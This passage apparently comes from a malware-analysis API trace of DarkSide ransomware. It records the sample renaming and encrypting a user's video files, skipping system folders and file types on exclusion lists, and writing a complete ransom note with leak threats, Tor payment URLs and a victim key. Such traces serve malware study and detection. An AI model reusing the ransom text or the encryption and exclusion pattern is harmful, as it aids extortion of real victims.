HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" [0156.789] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn") returned 0x42 [0156.789] wcscpy (in: _Dest=0x453012e, _Source="TbTXIkRpC9ijh71zsc.avi" | out: _Dest="TbTXIkRpC9ijh71zsc.avi") returned="TbTXIkRpC9ijh71zsc.avi" [0156.789] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi", dwFileAttributes=0x80) returned 1 [0156.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\tbtxikrpc9ijh71zsc.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0156.789] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.789] ReadFile (in: hFile=0x368, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0156.790] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xf6eb056f [0156.790] RtlComputeCrc32 (PartialCrc=0x56f, Buffer=0x3fe674, Length=0x80) returned 0x14815977 [0156.790] RtlComputeCrc32 (PartialCrc=0x5977, Buffer=0x3fe674, Length=0x80) returned 0xd09e4c60 [0156.790] RtlComputeCrc32 (PartialCrc=0x4c60, Buffer=0x3fe674, Length=0x80) returned 0xfb2f707d [0156.790] RtlComputeCrc32 (PartialCrc=0x707d, Buffer=0x3fe674, Length=0x80) returned 0x161f4285 [0156.790] CloseHandle (hObject=0x368) returned 1 [0156.790] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.791] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi" [0156.791] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi") returned 0x59 [0156.791] wcscpy (in: _Dest=0x4540162, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.791] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\tbtxikrpc9ijh71zsc.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\tbtxikrpc9ijh71zsc.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\TbTXIkRpC9ijh71zsc.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\tbtxikrpc9ijh71zsc.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x368 [0156.793] CreateIoCompletionPort (FileHandle=0x368, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.793] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4ca0020 [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x554eb05d [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa426c25 [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb4d79f0 [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd6f793b [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51f46528 [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3cd0e2e8 [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50b73e4 [0156.799] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29bea99e [0156.802] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4ca0094, Length=0x80) returned 0x1675ee8f [0156.802] RtlComputeCrc32 (PartialCrc=0xee8f, Buffer=0x4ca0094, Length=0x80) returned 0xb9e98687 [0156.802] RtlComputeCrc32 (PartialCrc=0x8687, Buffer=0x4ca0094, Length=0x80) returned 0x9cf72595 [0156.802] RtlComputeCrc32 (PartialCrc=0x2595, Buffer=0x4ca0094, Length=0x80) returned 0xd522b032 [0156.802] RtlComputeCrc32 (PartialCrc=0xb032, Buffer=0x4ca0094, Length=0x80) returned 0xb7788cb8 [0156.802] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0156.802] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.802] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.803] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x323b2840, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xf90d3ce0, ftLastAccessTime.dwHighDateTime=0x1d5e772, ftLastWriteTime.dwLowDateTime=0xf90d3ce0, ftLastWriteTime.dwHighDateTime=0x1d5e772, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YJ8O1oZ4VFaX7", cAlternateFileName="YJ8O1O~1")) returned 1 [0156.803] _wcsicmp (_Str1="$recycle.bin", _Str2="YJ8O1oZ4VFaX7") returned -85 [0156.803] wcslen (_String="$recycle.bin") returned 0xc [0156.803] _wcsicmp (_Str1="config.msi", _Str2="YJ8O1oZ4VFaX7") returned -22 [0156.803] wcslen (_String="config.msi") returned 0xa [0156.803] _wcsicmp (_Str1="$windows.~bt", _Str2="YJ8O1oZ4VFaX7") returned -85 [0156.803] wcslen (_String="$windows.~bt") returned 0xc [0156.803] _wcsicmp (_Str1="$windows.~ws", _Str2="YJ8O1oZ4VFaX7") returned -85 [0156.803] wcslen (_String="$windows.~ws") returned 0xc [0156.803] _wcsicmp (_Str1="windows", _Str2="YJ8O1oZ4VFaX7") returned -2 [0156.803] wcslen (_String="windows") returned 0x7 [0156.803] _wcsicmp (_Str1="appdata", _Str2="YJ8O1oZ4VFaX7") returned -24 [0156.803] wcslen (_String="appdata") returned 0x7 [0156.803] _wcsicmp (_Str1="application data", _Str2="YJ8O1oZ4VFaX7") returned -24 [0156.803] wcslen (_String="application data") returned 0x10 [0156.803] _wcsicmp (_Str1="boot", _Str2="YJ8O1oZ4VFaX7") returned -23 [0156.803] wcslen (_String="boot") returned 0x4 [0156.803] _wcsicmp (_Str1="google", _Str2="YJ8O1oZ4VFaX7") returned -18 [0156.803] wcslen (_String="google") returned 0x6 [0156.803] _wcsicmp (_Str1="mozilla", _Str2="YJ8O1oZ4VFaX7") returned -12 [0156.803] wcslen (_String="mozilla") returned 0x7 [0156.803] _wcsicmp (_Str1="program files", _Str2="YJ8O1oZ4VFaX7") returned -9 [0156.803] wcslen (_String="program files") returned 0xd [0156.803] _wcsicmp (_Str1="program files (x86)", _Str2="YJ8O1oZ4VFaX7") returned -9 [0156.803] wcslen (_String="program files (x86)") returned 0x13 [0156.803] _wcsicmp (_Str1="programdata", _Str2="YJ8O1oZ4VFaX7") returned -9 [0156.803] wcslen (_String="programdata") returned 0xb [0156.803] _wcsicmp (_Str1="system volume information", _Str2="YJ8O1oZ4VFaX7") returned -6 [0156.804] wcslen (_String="system volume information") returned 0x19 [0156.804] _wcsicmp (_Str1="tor browser", _Str2="YJ8O1oZ4VFaX7") returned -5 [0156.804] wcslen (_String="tor browser") returned 0xb [0156.804] _wcsicmp (_Str1="windows.old", _Str2="YJ8O1oZ4VFaX7") returned -2 [0156.804] wcslen (_String="windows.old") returned 0xb [0156.804] _wcsicmp (_Str1="intel", _Str2="YJ8O1oZ4VFaX7") returned -16 [0156.804] wcslen (_String="intel") returned 0x5 [0156.804] _wcsicmp (_Str1="msocache", _Str2="YJ8O1oZ4VFaX7") returned -12 [0156.804] wcslen (_String="msocache") returned 0x8 [0156.804] _wcsicmp (_Str1="perflogs", _Str2="YJ8O1oZ4VFaX7") returned -9 [0156.804] wcslen (_String="perflogs") returned 0x8 [0156.804] _wcsicmp (_Str1="x64dbg", _Str2="YJ8O1oZ4VFaX7") returned -1 [0156.804] wcslen (_String="x64dbg") returned 0x6 [0156.804] _wcsicmp (_Str1="public", _Str2="YJ8O1oZ4VFaX7") returned -9 [0156.804] wcslen (_String="public") returned 0x6 [0156.804] _wcsicmp (_Str1="all users", _Str2="YJ8O1oZ4VFaX7") returned -24 [0156.804] wcslen (_String="all users") returned 0x9 [0156.804] _wcsicmp (_Str1="default", _Str2="YJ8O1oZ4VFaX7") returned -21 [0156.804] wcslen (_String="default") returned 0x7 [0156.804] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*" [0156.804] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\*") returned 0x44 [0156.804] wcscpy (in: _Dest=0x451011e, _Source="YJ8O1oZ4VFaX7" | out: _Dest="YJ8O1oZ4VFaX7") returned="YJ8O1oZ4VFaX7" [0156.804] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.804] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0156.806] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" [0156.806] GetNamedSecurityInfoW () returned 0x0 [0156.806] SetEntriesInAclW () returned 0x0 [0156.806] SetNamedSecurityInfoW () returned 0x0 [0156.808] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2e25010) returned 1 [0156.808] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe33c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0156.808] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7")) returned 1 [0156.808] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0156.808] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0156.867] WriteFile (in: hFile=0x670, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe30c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe30c*=0xa8f, lpOverlapped=0x0) returned 1 [0156.868] CloseHandle (hObject=0x670) returned 1 [0156.868] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0156.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7")) returned 0x10 [0156.868] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\") returned="" [0156.868] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\") returned 0x51 [0156.869] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe56c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe56c) returned 0x2db8800 [0156.869] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x323b2840, ftCreationTime.dwHighDateTime=0x1d5e3d3, ftLastAccessTime.dwLowDateTime=0xdc1d2880, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdc1d2880, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.869] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65c1e3d0, ftCreationTime.dwHighDateTime=0x1d5e3e1, ftLastAccessTime.dwLowDateTime=0xaef5b990, ftLastAccessTime.dwHighDateTime=0x1d5dcad, ftLastWriteTime.dwLowDateTime=0xaef5b990, ftLastWriteTime.dwHighDateTime=0x1d5dcad, nFileSizeHigh=0x0, nFileSizeLow=0x11e61, dwReserved0=0x0, dwReserved1=0x0, cFileName="bq ithdPfB.mp4", cAlternateFileName="BQITHD~1.MP4")) returned 1 [0156.869] _wcsicmp (_Str1="bq ithdPfB.mp4", _Str2="README.c06622a1.TXT") returned -16 [0156.869] wcsstr (_Str="bq ithdPfB.mp4", _SubStr="README") returned 0x0 [0156.870] _wcsicmp (_Str1="autorun.inf", _Str2="bq ithdPfB.mp4") returned -1 [0156.870] wcslen (_String="autorun.inf") returned 0xb [0156.870] _wcsicmp (_Str1="boot.ini", _Str2="bq ithdPfB.mp4") returned -2 [0156.870] wcslen (_String="boot.ini") returned 0x8 [0156.870] _wcsicmp (_Str1="bootfont.bin", _Str2="bq ithdPfB.mp4") returned -2 [0156.870] wcslen (_String="bootfont.bin") returned 0xc [0156.870] _wcsicmp (_Str1="bootsect.bak", _Str2="bq ithdPfB.mp4") returned -2 [0156.870] wcslen (_String="bootsect.bak") returned 0xc [0156.870] _wcsicmp (_Str1="desktop.ini", _Str2="bq ithdPfB.mp4") returned 2 [0156.870] wcslen (_String="desktop.ini") returned 0xb [0156.870] _wcsicmp (_Str1="iconcache.db", _Str2="bq ithdPfB.mp4") returned 7 [0156.870] wcslen (_String="iconcache.db") returned 0xc [0156.870] _wcsicmp (_Str1="ntldr", _Str2="bq ithdPfB.mp4") returned 12 [0156.870] wcslen (_String="ntldr") returned 0x5 [0156.870] _wcsicmp (_Str1="ntuser.dat", _Str2="bq ithdPfB.mp4") returned 12 [0156.870] wcslen (_String="ntuser.dat") returned 0xa [0156.870] _wcsicmp (_Str1="ntuser.dat.log", _Str2="bq ithdPfB.mp4") returned 12 [0156.870] wcslen (_String="ntuser.dat.log") returned 0xe [0156.870] _wcsicmp (_Str1="ntuser.ini", _Str2="bq ithdPfB.mp4") returned 12 [0156.870] wcslen (_String="ntuser.ini") returned 0xa [0156.870] _wcsicmp (_Str1="thumbs.db", _Str2="bq ithdPfB.mp4") returned 18 [0156.870] wcslen (_String="thumbs.db") returned 0x9 [0156.870] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.870] wcslen (_String="386") returned 0x3 [0156.870] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.870] wcslen (_String="adv") returned 0x3 [0156.870] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.870] wcslen (_String="ani") returned 0x3 [0156.870] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.870] wcslen (_String="bat") returned 0x3 [0156.870] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.870] wcslen (_String="bin") returned 0x3 [0156.870] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.870] wcslen (_String="cab") returned 0x3 [0156.870] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.870] wcslen (_String="cmd") returned 0x3 [0156.870] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.870] wcslen (_String="com") returned 0x3 [0156.871] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.871] wcslen (_String="cpl") returned 0x3 [0156.871] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.871] wcslen (_String="cur") returned 0x3 [0156.871] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.871] wcslen (_String="deskthemepack") returned 0xd [0156.871] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.871] wcslen (_String="diagcab") returned 0x7 [0156.871] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.871] wcslen (_String="diagcfg") returned 0x7 [0156.871] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.871] wcslen (_String="diagpkg") returned 0x7 [0156.871] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.871] wcslen (_String="dll") returned 0x3 [0156.871] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.871] wcslen (_String="drv") returned 0x3 [0156.871] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.871] wcslen (_String="exe") returned 0x3 [0156.871] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.871] wcslen (_String="hlp") returned 0x3 [0156.871] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.871] wcslen (_String="icl") returned 0x3 [0156.871] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.871] wcslen (_String="icns") returned 0x4 [0156.871] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.871] wcslen (_String="ico") returned 0x3 [0156.871] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.871] wcslen (_String="ics") returned 0x3 [0156.871] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.871] wcslen (_String="idx") returned 0x3 [0156.871] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.871] wcslen (_String="ldf") returned 0x3 [0156.871] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.871] wcslen (_String="lnk") returned 0x3 [0156.871] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.871] wcslen (_String="mod") returned 0x3 [0156.871] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.871] wcslen (_String="mpa") returned 0x3 [0156.871] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.872] wcslen (_String="msc") returned 0x3 [0156.872] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.872] wcslen (_String="msp") returned 0x3 [0156.872] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.872] wcslen (_String="msstyles") returned 0x8 [0156.872] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.872] wcslen (_String="msu") returned 0x3 [0156.872] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.872] wcslen (_String="nls") returned 0x3 [0156.872] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.872] wcslen (_String="nomedia") returned 0x7 [0156.872] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.872] wcslen (_String="ocx") returned 0x3 [0156.872] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.872] wcslen (_String="prf") returned 0x3 [0156.872] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.872] wcslen (_String="ps1") returned 0x3 [0156.872] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.872] wcslen (_String="rom") returned 0x3 [0156.872] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.872] wcslen (_String="rtp") returned 0x3 [0156.872] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.873] wcslen (_String="scr") returned 0x3 [0156.873] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.873] wcslen (_String="shs") returned 0x3 [0156.873] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.873] wcslen (_String="spl") returned 0x3 [0156.873] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.873] wcslen (_String="sys") returned 0x3 [0156.873] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.873] wcslen (_String="theme") returned 0x5 [0156.873] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.873] wcslen (_String="themepack") returned 0x9 [0156.873] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.873] wcslen (_String="wpx") returned 0x3 [0156.873] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.873] wcslen (_String="lock") returned 0x4 [0156.873] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.873] wcslen (_String="key") returned 0x3 [0156.873] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.873] wcslen (_String="hta") returned 0x3 [0156.873] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.873] wcslen (_String="msi") returned 0x3 [0156.873] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.873] wcslen (_String="pdb") returned 0x3 [0156.873] _wcsicmp (_Str1="sql", _Str2="mp4") returned 6 [0156.873] wcslen (_String="sql") returned 0x3 [0156.873] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.873] wcslen (_String="sqlite") returned 0x6 [0156.873] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\yj8o1oz4vfax7")) returned 0x10 [0156.873] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.874] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7" [0156.874] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\YJ8O1oZ4VFaX7") returned 0x50 